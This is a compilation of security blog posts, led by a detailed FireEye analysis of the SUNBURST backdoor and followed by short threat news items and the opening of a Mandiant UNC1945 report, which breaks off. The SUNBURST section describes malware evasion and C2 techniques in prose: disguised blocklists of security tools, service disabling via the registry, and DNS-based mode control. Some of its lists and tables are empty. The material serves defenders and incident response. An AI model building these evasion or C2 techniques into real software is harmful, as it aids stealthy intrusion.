FireEye has discovered additional details about the SUNBURST backdoor since our initial publication on Dec. 13, 2020. Before diving into the technical depth of this malware, we recommend readers familiarize themselves with our blog post about the SolarWinds supply chain compromise, which revealed a global intrusion campaign by a sophisticated threat actor we are currently tracking as UNC2452.

SUNBURST is a trojanized version of a digitally signed SolarWinds Orion plugin called SolarWinds.Orion.Core.BusinessLayer.dll. The plugin contains a backdoor that communicates via HTTP to third party servers. After an initial dormant period of up to two weeks, SUNBURST may retrieve and execute commands that instruct the backdoor to transfer files, execute files, profile the system, reboot the system, and disable system services. The malware's network traffic attempts to blend in with legitimate SolarWinds activity by imitating the Orion Improvement Program (OIP) protocol and persistent state data is stored within legitimate plugin configuration files. The backdoor uses multiple obfuscated blocklists to identify processes, services, and drivers associated with forensic and anti-virus tools.

In this post, the following topics are covered in greater detail:

  • Anti-Analysis Environment Checks and Blocklists
  • Domain Generation Algorithm and Variations
  • Command and Control (C2) behaviors for DNS A and CNAME records
  • Malware modes of operation

Anti-Analysis Environment Checks

Before reaching out to its C2 server, SUNBURST performs numerous checks to ensure no analysis tools are present. It checks process names, file write timestamps, and Active Directory (AD) domains before proceeding. We believe that these checks helped SUNBURST evade detection by anti-virus software and forensic investigators for seven months after its introduction to the SolarWinds Orion supply chain.

First, the backdoor verifies that the lowercase name of the current process is solarwinds.businesslayerhost. UNC2452 avoided including this string directly in the source code by computing a hash of the string and comparing the result to the 64-bit number 17291806236368054941. The hash value is calculated as a standard FNV-1A 64-bit hash with an additional XOR by the 64-bit number 6605813339339102567. The additional XOR operation forces malware analysts to develop custom tools to brute force the hash preimage.

Next, the backdoor only executes if the filesystem last write time of the .NET assembly SolarWinds.Orion.Core.BusinessLayer.dll is at least 12 to 14 days prior to the current time. The exact threshold is selected randomly from this interval. In other words, SUNBURST lays low for almost two weeks before raising its head. If the timestamp check fails, the backdoor will execute again at a random later time when it is invoked by a legitimate recurring background task. Once the threshold is met, the sample creates the named pipe 583da945-62af-10e8-4902-a8f205c72b2e to ensure only one instance of the backdoor is running. If the named pipe already exists, the malware exits.

SUNBURST stores its configuration in the legitimate SolarWinds.Orion.Core.BusinessLayer.dll.config file. It repurposes two existing settings in the appSettings section:  ReportWatcherRetry and ReportWatcherPostpone. During initialization, the backdoor determines if the ReportWatcherRetry setting is the value 3. This value indicates the malware has been deactivated and will no longer perform any network activity. As we describe later, UNC2452 can command the backdoor to disable itself. This feature may be utilized when the operator determines the victim is not of interest or that they’ve completed their mission. When investigating a system compromised by SUNBURST, review this setting to determine if the backdoor has been disabled. Note, the presence of this value does not offer proof the actor did not further compromise the environment before disabling SUNBURST.

The backdoor also determines if the system is joined to an Active Directory (AD) domain and, if so, retrieves the domain name. Execution ceases if the system is not joined to an AD domain. SUNBURST checks the AD domain name against a blocklist and halts execution if it contains one of the following values:















We suspect these hard-coded AD domains may be SolarWinds internal domains that UNC2452 wanted to avoid.

Finally, SUNBURST verifies the system has internet connectivity by ensuring it can resolve the DNS name Otherwise, execution stops and retries at a random later time.

Anti-Analysis Blocklists

SUNBURST's behavior is affected by the presence of malware analysis and security software. To disguise the strings used to detect these security tools, UNC2452 calculated and embedded a hash value for each string. While it is trivial for the backdoor to check for the existence of a hashed process name, it is computationally expensive to determine what string a hash value corresponds to (the “preimage”). However, thanks to some hard work by members of the information security community, the hashes have been successfully brute-forced. The list of hashes and their corresponding strings can be viewed at this FireEye GitHub page.

SUNBURST uses the aforementioned FNV-1A plus XOR algorithm to compute the hash of each process name, service name, and driver filename on the system.

If a blocklisted process or driver name is found, SUNBURST pauses and tries again later. The backdoor continues past this check only when there are no processes nor drivers from the blocklist present.

If a blocklisted service is found, SUNBURST attempts to disable the blocklisted service by manipulating the service configuration in the Windows Registry. It sets the registry value HKLM\SYSTEM\CurrentControlSet\services\<service_name>\Start to the value 4, which corresponds to SERVICE_DISABLED. As a result, the blocklisted service is disabled on the next power cycle. This means the presence of a blocklisted service on a compromised host does not make a system immune to SUNBURST.

After the registry modification is made, SUNBURST updates the ReportWatcherPostpone configuration value to reflect the service it disabled. Then, the backdoor pauses and retries the process and service blocklist checks at a later time.

Subsequent service blocklist checks skip services already present in the ReportWatcherPostpone configuration key. SUNBURST will not treat the services it has disabled as members of the blocklist anymore. Therefore, during an incident response, forensic teams should consider recovering and decoding this configuration key to parse out which services SUNBURST attempted to disable.

Domain Generation Algorithm

In this section we describe how SUNBURST uses an intermediary command and control (C2) coordinator to retrieve its final C2 server. The C2 coordinator instructs the backdoor to continue or halt beaconing. It also redirects SUNBURST to its final C2 server via DNS CNAME records. We believe this enables UNC2452 to compartmentalize their operations, limiting the network infrastructure shared among victims.

The C2 coordinator is implemented as the authoritative DNS server for the avsvmcloud[.]com domain. To communicate with the C2 coordinator, SUNBURST uses a Domain Generation Algorithm (DGA) to construct subdomains of avsvmcloud[.]com and resolves the fully qualified domain names (FQDN) using the system DNS client. The backdoor interprets the DNS responses in an unusual way to receive orders from the C2 coordinator.

The DGA generates subdomains with the following DNS suffixes to create the FQDN:


A method named Update is responsible for initializing cryptographic helpers for the generation of these random-looking C2 subdomains. Subdomains are generated by concatenating an encoded user ID with an encoding of the system's domain name. The C2 coordinator can recover the victim domain name from the encoded data and likely uses this to route SUNBURST to its final C2 server.

A user ID is generated based on three values:

  • MAC address of the first available, non-loopback network interface
  • Domain name
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid value

SUNBURST takes the MD5 hash of these combined values and encodes it using a custom XOR scheme. We believe this value is used by UNC2452 to track unique victims.

SUNBURST uses four different forms of subdomains to signify the operating mode of the backdoor. Each form contains slightly different information. However, in two of the forms, investigators can recover the domain names of victim organizations. We recommend reviewing DNS logs to confirm the presence of a victim’s domain in SUNBURST C2 coordinator traffic.

When SUNBURST is in its initial mode, it embeds the domain of the victim organization in its DGA-generated domain prefix. Once the malware transitions to an “active” mode, the malware uses the other two forms of subdomains. These do not include the AD domain, but instead include encodings of either the list of running and stopped services or a timestamp.

The open-source community has done a fantastic job reverse engineering many of the subdomain forms. While we are not aware of any public decoder scripts that reverse all four possible encodings, most decoders focus on recovering the most useful information: the user ID and domain name embedded in the subdomains. We recommend that incident responders for victim organizations with access to DNS logs use these tools to confirm their AD domains are not embedded within SUNBURST generated DNS subdomains. Note that this does not indicate follow-on activity.

The following sources may be referenced for decoding such domains:

Figure 1: Diagram of actor operations and usage of SUNBURST

Command and Control

SUNBURST uses a two-part C2 protocol that involves both DNS and HTTP. In “passive” mode, the backdoor communicates with its C2 coordinator via DNS and receives high-level updates to its state. For example, the C2 coordinator may tell the backdoor to go to sleep or spring into action. When the backdoor is in “active” mode, it communicates via HTTP to its final C2 server and receives detailed commands such as “spawn a process” or “transfer a file”.

DNS C2 and the C2 Coordinator Protocol

When communicating with the C2 coordinator, the backdoor continuously generates domains via its DGA. The backdoor delays execution for random intervals between generating domains. In some cases, this delay is up to 9 hours.

If the C2 coordinator responds with a DNS A record, SUNBURST checks the resolved address against a hard-coded list of IP address blocks. If the address falls within a block, the backdoor transitions into an associated mode. The backdoor starts in the “passive” mode where it does nothing but check blocklists, sleep, and beacon via DNS until a transition is seen. Other modes are “active”, in which the malware communicates via HTTP, and “disabled”, in which the malware is permanently disabled. These modes and transitions are defined in the Modes of Operation section.

The C2 coordinator may also respond with a DNS CNAME response. In this case, the malware uses the pointed-to domain from the CNAME response for HTTPS C2 communications. SUNBURST starts a thread to handle command execution and further C2 HTTP(S) callouts. As an investigator, if you see CNAME resolutions for subdomains of avsvmcloud[.]com, it‘s possible that UNC2452 initiated follow-on C2 within the environment.

Note, the malware must receive a DNS A record response pointing to one of the following subnets immediately prior to receiving a DNS CNAME response. Otherwise, the CNAME resolution will be ignored and treated as an error. In addition, for these subnets, the least-significant bytes from the A record IP address are parsed to obtain configuration data such as the proxy method to use, the URI scheme to use, and a delay value used in the HTTP thread.

Subsequent DNS A record responses in the following subnet ranges cause the DGA beaconing to continue.


Otherwise, subsequent DNS A record responses in the following subnet ranges cause SUNBURST to terminate and update the configuration key ReportWatcherRetry to a value that prevents further execution. This is the killswitch.

fc00:: - fe00::

fec0:: - ffc0::

ff00:: - ff00::


While in “active” mode, the DGA subdomain encoding does not include victim machine domain name information. Instead, the DGA subdomains encode a timestamp or the list of stopped/running services. To transition back to “passive” mode, the malware operator may set the DNS server to resolve A records within the following IP ranges:

If the malware is transitioned from the “active” mode back to “passive”, the C2 coordinator must repeat the activation process if the operator wants to re-activate the sample.


After receiving a CNAME DNS response with a new host to communicate with, SUNBURST starts a new thread to execute the method HttpHelper.Initialize. This method is responsible for the C2 communications and dispatching. The HTTP thread begins by delaying for a configurable amount of time that is controlled by the SetTime command. The HTTP thread delays for a minimum of one minute between callouts. The malware uses HTTP GET or POST requests. The sample disables certificate verification so it is possible to decrypt HTTPS traffic if SSL man-in-the-middle is performed.

The malware constructs HTTP GET or POST request URIs from random selections of substrings. The scheme used depends on the A record received just prior to the CNAME DNS response. When sending a GET request, the malware adds an "If-None-Match" HTTP header that includes the encoded user ID. This likely allows the C2 server to determine which SUNBURST installation generated the request, further enabling multiplexing of C2 streams on a single server.

In observed traffic, the C2 server employs steganography to hide data within HTTP response bodies and attempts to appear as benign XML related to .NET assemblies. Command data is spread across many GUID and hexadecimal strings. Commands are extracted from HTTP response bodies by searching for hexadecimal strings using the following regular expression: "\{[0-9a-f-]{36}\}"|"[0-9a-f]{32}"|"[0-9a-f]{16}". Matched substrings in the response are filtered for non-hex characters, joined together, and hex-decoded. Depending on the mode of operation, the malware may skip the steganography and send the encoded response in an HTTP response body.

Figure 2: C2 response embeds commands in XML GUIDs

In the received C2 response, the first DWORD value indicates the actual size of the message. This value is followed immediately by the message with optional junk bytes added. The extracted message is single-byte XOR decoded using the first byte of the message. The result is then DEFLATE decompressed. The first character of the decompressed data is an ASCII integer that maps to a command ID, with optional additional command arguments delimited by space characters. The supported commands are shown in the following table.





No operation 


Terminate the current thread. 


Sets the delay time between main event loop executions Delay is in seconds, and varies random between [.9 * <delay>, 1.1 * <delay>] 

If the delay is < 300 it is doubled on the next execution through the loop, this means it should settle onto an interval of around [5, 10] minutes 

o There is a second, unrelated delay routine that delays for a random interval between [16hrs, 83hrs] 



Profile the local system including hostname, username, OS version, MAC addresses, IP address, DHCP configuration, and domain information. 


Perform an HTTP request to the specified URL, parse the results and send the response to the C2 server. 


Starts a new process with the given file path and arguments 


Returns a process listing. If no arguments are provided, returns just the PID and process name.  If an argument is provided, it also returns the parent PID and username and domain for the process owner. 


Terminate the given process, by PID. 


Given a path, and a match pattern recursively list files and directories.


Given a file path and a Base64-encoded string write the contents of the Base64 string to the given file path. Write using append mode. Delay for [1s, 2s] after writing is done. 



Tests whether the given file path exists. 



Deletes the specified file path. 



Compute the MD5 of a file at a given path and return the result as a hex string. If an argument is provided, it is the expected MD5 hash of the file and returns an error if the calculated MD5 differs. 



Arbitrary registry read from one of the supported hives.



Arbitrary registry write from one of the supported hives. 



Arbitrary registry delete from one of the supported hives.



Returns listing of subkeys and value names beneath the given registry path.



Attempts to immediately trigger a system reboot. 

SUNBURST sends messages back to the C2 server using a protocol that consists of UTF-8 strings and an appended 4-byte error DWORD and 8-byte userID. These are bare DEFLATE compressed and single-byte XOR encoded with the XOR key prepended to the message. Message payloads of length 10,000 or less are turned into JSON documents that resemble the Orion Improvement Program (OIP) messages used legitimately by SolarWinds. Messages larger than 10,000 bytes are sent as-is in the HTTP request body.

The fake OIP document contains the following fields:

  • userId – a unique identifier for the victim machine
  • sessionID – stores a new random GUID for each HTTP thread
  • steps – an array of objects that contain the following keys: Timestamp, Index, EventType, EventName, DurationMs, Succeeded, and Message.

The JSON key EventType is hard-coded to the value Orion and the EventName is hard-coded to EventManager. The encoded message to send to the C2 server is split up into random ranges, Base64-encoded, and stored in the Message field of the objects in the steps array. Not all objects in the steps array contribute to the malware response. The integer in the Timestamp field must have the 0x2 bit set to indicate the contents of the Message field are used in the malware response. steps objects whose 0x2 bit is clear in the Timestamp field contain random data and are discarded when assembling the malware response. This may be an attempt to hinder analysis in the absence of the malware sample.

Figure 3: HTTP callout masquerades as OIP protocol

Modes of Operation

As detailed in the DGA section, the malware has multiple modes of operation configured by the IP block that A records resolve to as well as depending on if CNAME records exist. These modes of operation are stored in internal enumerations. These mappings and values are described next.

Internal Modes

The following modes govern internal operations of the malware:

Mode Name





Disabled; the malware killswitch has been activated and the sample may never run again without external modification to the XML configuration on-disk.



Passive mode; DGA subdomains encode the system’s domain name



Active mode; C2 beaconing will occur on next CNAME resolve or is already actively occurring. DGA domains encode either the userID or the list of services

The mode values are written into the backdoor configuration key ReportWatcherRetry. Investigators may consider recovering the malware configuration and inspecting this configuration value to determine the last running mode of the malware.

The following transitions govern how IP block ranges are translated into running modes:

Transition Name



Transition to Truncate


Transition from Append to New


Transition to Truncate


Transition to Append, either start or continue C2 beaconing


Not an IPv4 or IPv6 address, exit and retry DGA later

The following diagram describes how the SUNBURST’s DGA DNS responses act as mode transitions to control the malware before HTTP-based C2 beaconing has even begun:

Additionally, here is an annotated network log showing how a sequence of DNS resolutions can transition the malware mode:

To end this discussion of modes and transitions, a small note about the choices of these IP blocks. In cases such as the ImpLink IP blocks that activate the killswitch, it’s likely that the ranges were specifically chosen by the attacker to avoid being discovered by security researchers. In other cases, such as the NetBios and "special" NetBios IP blocks, the companies these blocks resolve to is likely irrelevant or at least beyond what can be definitively said without speculation.

Malware Flow Diagram

The following diagram provides a full picture of the malware's execution. Internally, SUNBURST uses a set of modes and transitions as described earlier. The names of these modes and transitions have no meaning. The malware authors purposely chose them as a form of obfuscation. When diagraming the malware's execution, these names were reused for clarity.

Figure 4: Malware logic and decision states


Is a system running blocklisted processes, services, or drivers safe from compromise?

Sometimes, but not always. SUNBURST unconditionally exits if blocklisted processes or drivers are found and will not run until they are no longer detected. On the other hand, services are disabled by setting a registry value that controls startup initialization and are not explicitly stopped. As a result, a blocklisted service may still be running when the malware performs its service checks later. For this reason, it is possible for a victim system to be infected while a blocklisted service is running. Additionally, SUNBURST only attempts to disable a service once and updates its configuration to mark the service as disabled. Once the configuration is updated, the service is not treated as a blocklisted entry during subsequent execution. 

Does observing one DGA encoding over another provide any information during incident response?

Short answer: it provides a hint for where to look but isn’t a be-all tell-all alone. Noticing the DGA encoding change in network logs is a hint that the malware may have moved from New to Append or Append to New. This puts the malware in a mode where if a CNAME record is seen soon after, then HTTP C2 can begin. Incident response should focus on trying to identify CNAME records being successfully resolved instead of focusing on DGA encodings entirely. Identifying CNAME records is easier than tracking the malware mode through logs and a stronger signal.

What is the "killswitch"?

FireEye discovered that certain DNS responses cause the malware to disable itself and stop further network activity. With the support and help of GoDaddy’s Abuse Team and the Microsoft Threat Intelligence Center, the domain used for resolving DGA domains was reconfigured to point to a sinkhole server under Microsoft’s control. The IP of this sinkhole server was specially chosen to fall into the range used by the malware to transition from its current mode (New or Append) into Truncate mode where it will be permanently inactive. In other words, SUNBURST infections should now be inoculated due to the killswitch.

When C2 communication occurs, is a CNAME record required?

CNAME records are required for HTTP C2 beaconing to occur and are provided by the C2 coordinator to specify the final C2 server. C2 activity must occur over a domain name provided via a CNAME record. It cannot occur directly via a raw IP. To initialize C2 beaconing, the backdoor first looks for an A record response from one of its special NetBios subnets and subsequently expects to receive a CNAME record.

If a DGA domain is decoded to a company domain name, is that company compromised?

When the backdoor is in “passive” mode it uses the DGA encoding which embeds victim AD domain names. This means that any system where the backdoor is present may have started trying to contact DNS servers where an attacker could then activate the backdoor to begin active C2 communications. In most cases this did not occur and backdoors for non-targets were disabled by the operator. Therefore, it cannot be assumed that an organization experienced follow-on activity if their domain is decoded from any DNS logs. Specifically, it’s only an indicator that the backdoor code was present and capable of being activated.

Public Contributions

We have seen substantial community contributions to our public SUNBURST GitHub repository.

We would like to publicly thank all contributors to this repository. Specifically, all FNV hashes embedded within SUNBURST have been brute-forced. This is a huge amount of compute power that members of the community provided free-of-charge to help others. We want to thank everyone who contributed hashes and specifically callout the Hashcat community, which organized to systematically break each hash. This was essential for breaking the final few hashes whose preimage were of considerable length.


Matthew Williams, Michael Sikorski, Alex Berry and Robert Wallace.

For additional information on UNC2452, register for our webinar, UNC2452: What We Know So Far, on Tuesday, Jan. 12, at 8 a.m. PT/11 a.m. ET.

iPhones vulnerable to hacking tool for months, researchers say

Analysis: NSO Group’s Pegasus spyware could allegedly track locations and access passwords

For almost a year, spyware sold by Israel’s NSO Group was allegedly armed with a computer security super-weapon: a zero-footprint, zero-click, zero-day exploit that used a vulnerability in iMessage to seize control of an iPhone at the push of a button.

That means it would have left no visible trace of being placed on target’s phones, could be installed by simply sending a message that the victim didn’t even need to click on, and worked even on phones that were running the then-latest version of iOS, the operating system for iPhones.

Continue reading...

Cyber News Rundown: Trickbot Spreads Via Subway Emails

Trickbot spreading through Subway company emails

Customers of Subway U.K. have been receiving confirmation emails for recent orders that instead contain malicious links for initiating Trickbot malware downloads. Subway has since disclosed that it discovered unauthorized access to several of its servers, which then launched the campaign. Users who do click on the malicious link initiate a process in Task Manager that can be stopped to prevent additional illicit activities typical of Trickbot infections.

Scores of municipal websites attacked in Lithuania

At least 22 websites belonging to various municipalities in Lithuania were compromised after a sophisticated cyberattack allowed intruders to take control. After gaining access to the sites, the attackers began delivering misinformation emails under the auspices of Lithuanian government and military ministries. Much of the misinformation being spread revolved around military enlistment and the suspicion of corruption at an airport housing a NATO facility.

Researchers discover millions of medical records online

Researchers at CybelAngel have uncovered over 45 million healthcare records on unprotected servers. Amongst the sensitive data was personal health information and other personally identifiable data, all left on servers with a login page that allowed access without credentials. It’s likely this data was left unsecured because of the number of medical professionals needing to access, though the security lapse is inexcusable. With healthcare facilities prime targets for ransomware attacks, communications between organizations should entail strict security to protect the valuable data.

Ransomware strikes city of Independence, Missouri

Officials for the city of Independence, Missouri, have been working for weeks to recover from a ransomware attack that forced them to take several essential services offline. Fortunately, recent file backups were available to restore some of the encrypted systems to normal. At this point, officials remain uncertain if customer or employee data was stolen during the attack, and no ransomware group has come forward to take credit for the attack or post the stolen data for sale.

Data Breach Compromises Patient Data at California Hospital

California’s Sonoma Valley Hospital recently delivered letters to roughly 67,000 patients regarding a data breach back in October that may have compromised personally identifiable information and other healthcare records. While the hospital was able to shut down some of their systems to prevent the breach from spreading, the attackers are believed to have gained access to and stole sensitive data.

The post Cyber News Rundown: Trickbot Spreads Via Subway Emails appeared first on Webroot Blog.

Adrozek Malware is Wreaking Havoc on Web Browsers: How to Stay Protected


Adrozek Malware is Wreaking Havoc on Web Browsers: How to Stay Protected

Every few weeks, there seems to be breaking news about large-scale data breaches that affect millions – but what about the lesser-known threats that lurk quietly in the shadows? Oftentimes, these are the scams that could wreak havoc on our day-to-day digital lives.

Adrozek malware is just that: a new strain that affects web browsers, stealthily stealing credentials through “drive-by downloads,” or a download that happens without your knowledge.

Let’s unpack how this malware works, who it targets, and what we can do to protect our browsers from this sneaky threat.

Browsers, Beware!

According to Threatpost, Adrozek is infecting several web browsers (including Google Chrome, Microsoft Edge, Mozilla Firefox, and Yandex) on Windows machines with the help of a browser modifier that hijacks search results. To find its way onto our devices, the malware uses “drive-by downloads” once you load one of its several malicious web pages. In fact, a huge, global infrastructure supports Adrozek – one that is made up of 159 unique domain names, each hosting an average of 17,300 unique URLs, which in turn hosts more than 15,300 unique malware samples.

Once it makes its way onto your machine, the malware changes the device’s browser settings to allow Adrozek to insert fake ads over real ones. If you do happen to click on one of these fraudulent ads, the scammers behind this threat earn affiliate advertising dollars for each user they deceive. This not only takes money away from advertisers who are unaware that malware is increasing their traffic, but it also pays cybercriminals for their crimes. What’s more, the malware extracts data from the infected device and sends it to a remote server for future exploitation. In some cases, it even steals saved passwords from Firefox. These features allow the cybercriminals behind Adrozek to capitalize on the initial threat by collecting data that could be used against everyday users like you and me when we least expect it.

Adrozek: A Malware Chameleon

Aside from being supported by a vast infrastructure, Adrozek is powerful for another reason: it’s difficult to spot. Adrozek is a type of polymorphic malware, or malware that is programmed to constantly shift and change its code to avoid detection. As a result, it can be tricky to find and root out once it’s infected your browser.

Fight Back Against Malware

To help protect your devices from falling victim to the latest theats, follow these tips to help protect your online security:

Keep your browser updated

Software developers are actively working to identify and address security issues. Frequently update your browsers, operating systems, and apps so that they have the latest fixes and security protections.

Practice proper password hygiene

Because Adrozek actively steals saved passwords from Firefox, it’s crucial to practice good password hygiene. When updating your credentials, you should always ensure that your password is strong and unique. Many users utilize the same password or variations of it across all their accounts. Therefore, be sure to diversify your passcodes to ensure hackers cannot obtain access to all your accounts at once, should one password be compromised. You can also employ a password manager to keep track of your credentials.

Reinstall your browsers

You can typically get rid of browser-hijacking malware by resetting the browser. But because Adrozek will hide itself on your device, extra measures should be taken to get rid of it. If you suspect that Adrozek may have found its way onto your device, delete your browsers, run a malware scan, and reboot your device. Run the malware scan a second time and reinstall your browsers.

Use a comprehensive security solution

Use a solution like McAfee Total Protection, which can help protect devices against malware, phishing attacks, and other threats. It includes McAfee WebAdvisor, which can help identify malicious websites.

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Adrozek Malware is Wreaking Havoc on Web Browsers: How to Stay Protected appeared first on McAfee Blogs.

Malware Delivery Platforms in 2020

Once upon a time the Malware, the main actor in the entire infection chain. A single file, once executed it was able to perform the tasks it was designed for, forcing the target machine into victim by taking control or simply execuritying desired (sometime priviledged) commands. In 2010, during my PhD studies, I was already observing a slow but certain change in this panorama. During that period Matt and I wrote for IEEE a paper title: “Multi-stage delivery of malware” (HERE) where we described how thrat actors were abusing mutistaging techniques to inoculate malicious and unwanted software.

Malware signature detectors use patterns of bytes, or variations of patterns of bytes, to detect malware attempting to enter a systems. This approach assumes the signatures are both or sufficient length to identify the malware, and to distinguish it from non-malware objects entering the system. We describe a technique that can increase the difficulty of both to an arbitrary degree. This technique can exploit an optimization that many anti-virus systems use to make inserting the malware simple; fortunately, this particular exploit is easy to detect, provided the optimization is not present. We describe some experiments to test the effectiveness of this technique in evading existing signature-based malware detectors.

Multi-stage delivery of malware – Abstract

Nowadays these thechinques are so used that we are facing multistage frameworks rather than Malware. I do prefer call them Malware delivery platforms. I am talking about EMOTET, TrickBot, QakBot and so on, those frameworks are not Malware anymore (even if they started as Malware), but are real and powerfull platforms able to deliver multiple Malware. Once the multiple Malware have been dropped and executed into a single or multiple targets, we are facing an implant. So, after 10 Years from such a paper how many platforms have been developed and how do they behave ?

Malware Delivery Platforms

In this post I’d like to fix on my meories the Malware Delivery Platforms in 2020. I believe those platforms are changing again and again, I bet we’ll see some new evolutions on the Malware infection chain panorama in early future so let’s write some simple notes on how things are working today. Please if you have more infos or if you want to make this post up-to-date, please contact me (from HERE), I will make updates and written thank you to every contributors.


One of the most famous Malware Delivery Platforms. It is used to deliver (in 2020) Trickbot. Often involved in the multiple infection chain Emotet-Trickbot-Ruyk, developing one of the most spread Ransomware as a service in our recent history


One of the most sophisticated Malware Delivery Platforms. Often dropped and executed by Emotet (but not only) it’s famous to deliver Ryuk and Conti Ransomware.


BazarLoader not such a spread delivery platform in 2020, used mainly to deliver Ryuk Ransomware and linked to TrickBot


Interesting new (if compared to Emotet) Malware delivery platform. In the past months it has been observed tight to MegaCortex
and Egregor


One of the most famous platform related to TA505. It’s actually a quite wired platform, quite simple if compared to the “mainland” but seen as entry point for Clopper


A quite famous and ancient Banking Malware. It has got many upgrades during the years, nowadays it is mostly used as dropping platform mainly observed for launching BitPaymer and DoppelPaymer


ZLoader is a wellknown Delivery platform, mostly used in Europe and US. It has been mostly observet for spreading Ryuk and Egregor.


This is one of the latest entries in the Delivery Platforms landscaped. It is mostly seed to drop and execute Egregor and Ryuk Ransomware, while Sophos correlates BuerLoader Ryuk gang.


Nowadays is mostly spread in Japan and it’s a small and quite new Malware Delivery Platform. Todays known to drop and execute Avaddon.


This post is not about describing details on Malware Delivery Platforms (MDP), but it’s a simple way to freeze a state of the art as today (Decembre 2020) on MDP. This small post could be usefull for Cybersecurity Analysts and SOC operators which need to reconstruct the whole infection chain.

If you are aware on more platforms and you want to contribute, please reach me out and send commetns to me. I will update this post as soon as will receive your comments. It would be great to maintain this post up-to-date withing future platforms integrations.

Cyber News Rundown: Biological Worries Over Malware Attacks

Biological Worries Over Malware Attacks

Researchers have recently unveiled the latest potential victim for malware authors: biological laboratories. By illicitly accessing these facilities, hackers may be able to digitally replace sections of DNA strings, causing unexpected results when biologists go to create or experiment with these compounds. While it is fortunate that this specific targeted attack was simulated in a closed environment, it brought to light the extreme focus that a cyber-attack may be capable of implementing, and the lengths some attackers may go to accomplish their goal.

SMS App Exposes Messages of Millions

Despite the weeks of effort from the developer, GO SMS Pro an instant messaging app with over 100 million users is still suffering from messages being leaked. What originated as a bug has left the messaging app critically flawed for upwards of three months, with no clear signs of resolution, as even new versions of the app have been unable to rectify the problem. The researchers who discovered the flaw were able to view video and picture messages, along with other private messages, due to the URL shortening that occurs when the messages are sent to contacts that don’t have the app installed.

Colorado Health Service Provider Suffers Patient Data Breach

Sometime during the middle of September, the Colorado-based health service provider AspenPointe suffered a data breach that may have compromised the sensitive health information of nearly 300,000 patients. The facility noticed the unauthorized access over a two-week period, but only began notifying patients of the breach in the third week of November. Officials have also confirmed that everything from names to medical history, and other highly sensitive personal information was stolen, though no reports of misuse have yet arisen.

Ransomware Shuts Down Alabama School District

The Huntsville City school district, one of the largest in Alabama, has been forced to close all operations following a ransomware attack that took place as students and staff were returning from Thanksgiving break. District officials worked quickly to take all devices offline, be them computers or smart phones, to stop the spread of the attack. Students were also sent home early, with no firm statement on when classes would resume, as the attack could take them days or weeks to recover from.

Five Arrested in Louisiana Child Crime Sweep

At least 5 individuals have been arrested by the Louisiana Cyber Crime Unit, following an investigation into the online exploitation of children. By tracing IP addresses and even simply viewing social media profiles of all 5 individuals, law enforcement agents have been able to confirm charges of possession or creation of child pornography, thus removing another group of child predators from the general population.

The post Cyber News Rundown: Biological Worries Over Malware Attacks appeared first on Webroot Blog.

Live off the Land? How About Bringing Your Own Island? An Overview of UNC1945

Through Mandiant investigation of intrusions, the FLARE Advanced Practices team observed a group we track as UNC1945 compromise managed service providers and operate against a tailored set of targets within the financial and professional consulting industries by leveraging access to third-party networks (see this blog post for an in-depth description of “UNC” groups).

UNC1945 targeted Oracle Solaris operating systems, utilized several tools and utilities against Windows and Linux operating systems, loaded and operated custom virtual machines, and employed techniques to evade detection. UNC1945 demonstrated access to exploits, tools and malware for multiple operating systems, a disciplined interest in covering or manipulating their activity, and displayed advanced technical abilities during interactive operations.

Mandiant discovered and reported to Oracle CVE-2020-14871, which was addressed in Oracle's October 2020 Critical Patch Update. Mandiant recommends staying current on all current patch updates to ensure a high security posture. We will discuss this vulnerability in greater detail in a follow up blog post.

UNC1945 Attack Lifecycle

The threat actor demonstrated experience and comfort by utilizing unique tactics, techniques and procedures (TTPs) within Unix environments, demonstrating a high level of acumen in conjunction with ease of operability in Microsoft Windows operating systems. They were successful navigating multiple segmented networks and leveraging third-party access to extend operations well beyond the initial victim. Furthermore, UNC1945 operated from several virtual machines pre-configured with post-exploitation tools in addition to their custom toolset to evade detection and forensics.

Initial Compromise

In late 2018, UNC1945 gained access to a Solaris server and installed a backdoor we track as SLAPSTICK in order to capture connection details and credentials to facilitate further compromise. The SSH service of this server was exposed to the internet at the time, the same time we observed first evidence of threat activity. Unfortunately, due to insufficient available evidence, the next indication of activity was in mid-2020 at which time a different Solaris server was observed connecting to the threat actor infrastructure. This indicates a dwell time of approximately 519 days based on recovered artifacts.

  • Although we were unable to determine how the late-2018 initial access was accomplished, we did observe successful UNC1945 SSH connections directly to the victim Solaris 10 server, since the SSH service was exposed directly to the internet at the time.
  • In mid-2020, we observed UNC1945 deploy EVILSUN—a remote exploitation tool containing a zero-day exploit for CVE-2020-14871—on a Solaris 9 server. At the time, connections from the server to the threat actor IP address were observed over port 8080.
    • Mandiant discovered and reported CVE-2020-14871, a recently patched vulnerability in the Oracle Solaris Pluggable Authentication Module (PAM) that allows an unauthenticated attacker with network access via multiple protocols to exploit and compromise the operating system.
    • According to an April 2020 post on a black-market website, an “Oracle Solaris SSHD Remote Root Exploit” was available for approximately $3,000 USD, which may be identifiable with EVILSUN.
    • Additionally, we confirmed a Solaris server exposed to the internet had critical vulnerabilities, which included the possibility of remote exploitation without authentication.

Establish Foothold and Maintain Persistence

The threat actor used a Solaris Pluggable Authentication Module backdoor we refer to as SLAPSTICK to establish a foothold on a Solaris 9 server. This facilitated user access to the system with a secret hard-coded password and allowed the threat actors to escalate privileges and maintain persistence (see Figure 1).

  • Log –font –unix | /usr/lib/ssh/sshd sshd kbdint - can <Encoded Password> <IP REDACTED> Magical Password
  • | sshd[11800]: [ID 800047] Accepted keyboard-interactive for root from <IP REDACTED> port 39680 ssh2
  • auth.notice | su: [ID 366847 auth.notice] ‘su root’ - succeeded for netcool on /dev/pts/31

Figure 1: SLAPSTICK logs

At the initial victim, UNC1945 placed a copy of a legitimate file and SLAPSTICK in the /lib64/security folder. A day later, the threat actor positioned a custom Linux backdoor, which Mandiant named LEMONSTICK, on the same workstation. LEMONSTICK capabilities include command execution, file transfer and execution, and the ability to establish tunnel connections. (see Figure 2).

  • FileItem:changed | /usr/lib64/security/pam_unix,so [57720]
  • Audit log | [audit_type: USER_END] user pid=10080 uid=0 auid=0 msg='PAM: session close acct=root" : exe="/usr/sbin/sshd" (hostname=, addr=, terminal=ssh res=success)'"
  • FileItem:Accessed | /var/tmp/.cache/ocb_static

Figure 2: UNC1945 emplacement of SLAPSTICK 

